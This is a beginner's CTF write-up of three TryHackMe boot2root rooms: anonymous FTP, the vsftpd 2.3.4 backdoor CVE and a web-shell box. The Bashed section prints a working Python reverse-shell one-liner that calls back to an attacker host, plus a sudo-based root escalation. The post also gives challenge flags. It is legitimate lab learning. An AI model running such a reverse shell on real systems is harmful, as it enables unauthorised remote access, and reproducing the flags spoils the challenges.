🤖Aturkreatif'24 CTF Writeup
Writeups for Aturkreatif'24 CTF
Another year of joining internal CTF~ *screams.
This time around, I pushed myself to do as much challenge as I can to see how far I've come. I managed to solve 2 B2R challenges. For the 3rd one, I solved it after the competition (because my brain already crashed kaw kaw and I overthink a lot). Overall, it was a very nice set of challenges. Kudos to Amirul for the challenges!
Category: Boot2Root
Silent Access
Access the room here: https://tryhackme.com/r/room/aturkreatif2024ctf
First off, it's your usual recon, scanning ports and finding directories. However as I am competitive af and wants to get this quick, I used this tool, AutoRecon by Tib3rius (complete lifesaver). It automates directory busting, nmap scanning, etc. Super convenient!
Look's like FTP port is open, so let's get in. List files in FTP and there's a .txt file. Voila, we have found our first flag!
flag: 4turkr34tif24{20nra7s_7h15_15_70ur_fl@g}Episode 2
Access the room here: https://tryhackme.com/r/room/episode2
Now this one's very interesting for me.
First, we start with our usual scanning. Using AutoRecon has really saved my time!
We see there's an open ftp port. Let's check it out.
The hint mentioned about vstpd. Google lead me to this CVE, vsftpd 2.3.4 - Backdoor Command Execution.
I used this Github for my python script (creds to the owner!)
Save the script (I used nano), then run it.
Success! Poking around, the flag was hidden in ubuntu directory under Desktop. Gotcha!
flag: 4turkr34tif{M374spl0IT}Bashed
Access the room here: https://tryhackme.com/r/room/bashedboot2root
This challenge made me want to bash my head (literally)(jk)(maybe).
FIRST, I highly advise that you make a directory before you do the recon part. This will make your journey so much easier later.
As usual, we did some recon with AutoRecon. For the recon part, it's advisable that you wait 20 mins so that all the directories are discovered, this is important for the next steps. Thus begins the waiting game 😎
Navigate through the directory created earlier. Autorecon does nmap scans, dirbusting, all for you in a single results folder.
The results folder led me to a folder titled with our machine IP, which contain a scans folder that has another folder labelled tcp80. In tcp80, there's a .txt file related to dirbuster, so I checked the contents for possible directories to sneak in and exploit look into.
Aha! Found it!
Now that we have the link, we shall begin the process of getting the root.
Use revshells for the script crafting (I took Python3#1). Remember to use the ip from the Access part of your TryHackMe account. port number is up to you. Here's the script:
export RHOST="[ip]";export RPORT=[port];python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
Set up the listening port THEN access the web url for the script to work.
Run the script on the website and tada~ you're in! As per the hint given, the password is the same as the name.
Run sudo -l to see what we can exploit.
Aha! There's no password on the system shell. However, we do not have root privileges yet. The best way is to use sudo sh. It allows you to run the shell with superuser privileges.
Running the cat command gave us the flag.
4turkr34tif24{qs@1345Huyajs*&*ak34fQS}Overall, in my opinion, these are really good challenges for beginners in boot2root as you play around with scripts to perform reverse shell. I hope this writeup will help anyone looking to start solving b2r challenges. See ya!
Last updated